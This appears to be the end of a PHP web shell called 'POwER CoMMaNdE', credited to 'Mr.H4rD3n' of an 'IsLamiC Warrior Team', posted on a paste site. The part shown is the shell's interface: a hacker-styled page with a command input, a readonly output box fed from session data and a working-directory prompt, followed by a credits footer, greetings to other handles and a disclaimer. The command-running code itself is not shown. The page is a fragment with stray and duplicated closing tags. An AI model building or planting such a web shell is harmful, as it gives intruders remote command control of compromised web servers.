- body {font-family: sans-serif; color: black; background: white;}
- table{width: 600px; height: 300px; border: 1px #000000 solid; padding: 0px; margin: 0px;}
- td.head{background-color: #529ADE; color: #529ADE; font-weight:700; border: none; text-align: center; font-style: italic}
- textarea {width: 100%; border: none; padding: 2px 2px 2px; color: #529ADE; background-color: #000000;}
- p.prompt {font-family: monospace; margin: 0px; padding: 0px 2px 2px; background-color: #000000; color: #529ADE;}
- input.prompt {border: none; font-family: monospace; background-color: #000000; color: #529ADE;}
- </style>
- </head>
- <body onload="init()" style="background-color:#000000">
- <h2>POwER CoMMaNdE</h2>
- <?php if (empty($_REQUEST['rows'])) $_REQUEST['rows'] = 26; ?>
- </div>
- <div align="center">
- <table cellpadding="0" cellspacing="0">
- <tr><td class="head" style="color: #000000;"><b>PWD :</b></td>
- <td class="head"><?php echo $_SESSION['prompt'].":"."$_SESSION[cwd]"; ?>
- </td></tr>
- <tr><td width='100%' height='100%' colspan='2'><form name="shell" action="<?php echo $_SERVER['PHP_SELF'];?>" method="post">
- <textarea name="output" readonly="readonly" cols="85" rows="<?php echo $_REQUEST['rows'] ?>">
- <?php
- $lines = substr_count($_SESSION['output'], "\n");
- $padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
- echo rtrim($padding . $_SESSION['output']);
- ?>
- </textarea>
- <p class="prompt"><?php echo $_SESSION['prompt'].":>"; ?>
- <input class="prompt" name="command" type="text" onkeyup="key(event)" size="50" tabindex="1">
- </p>
- <? /*<p>
- <input type="submit" value="Execute Command" />
- <input type="submit" name="reset" value="Reset" />
- Rows: <input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" />
- </p>
- */?>
- </form></td></tr>
- </div>
- </table>
- </div>
- </body>
- </html>
- <?php ?><html><head><title>#Commanders - Private By Mr.H4rD3n - IsLamiC Warrior Team</title></head><body bgcolor="BLACK" background="http://localhost/a/matrix-animated-image.gif" style="background-color:#000000"></body></html></html><?php
- }
- //------------------------------------------------------------------------------------------------
- ?>
- <?php
- }
- // End Shell
- //-------------------------------------------------------------------------------------------------
- ?>
- <br /><br /><br /><font color="#23B627"><br />
- </font>
- <div class="end">
- <p align="center"><font color="#FFFFFF"><b>––•(-• © Copyright Mr.H4rD3n [All rights reserved] •-)•––</b><br />
- </font><font face="Verdana"><font color="#23B627">
- <a href="mailto:exploit-id@hotmail.com"><span style="text-decoration: none">
- <font color="#000000">My Email</font></span></a></font> | <font color="#23B627">
- <a href="http://facebook.com/Mr.H4rD3n"><span style="text-decoration: none">
- <font color="#000000">Facebook</font></span></a></a></font><a href="http://facebook.com/Mr.H4rD3n"><span style="text-decoration: none"><font color="#000000">
- </font></span></a>:) </font>
- <font color="#FFFFFF"> <br />
- \m/ <b>Greetz to</b> : Dr-AngeL - X-Line - Ghost.0f.Morocco - xMjahd - 4chrf -
- KhantastiC - X internet - And yOu ! \m/<br />
- "" WE ARE MUSLIMS, WE CAN NOT HARM ANY SITE I HOPE TO USE THIS TOOL ONLY WHAT
- PLEASE GOD "" </font>
- </p>
- </div>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement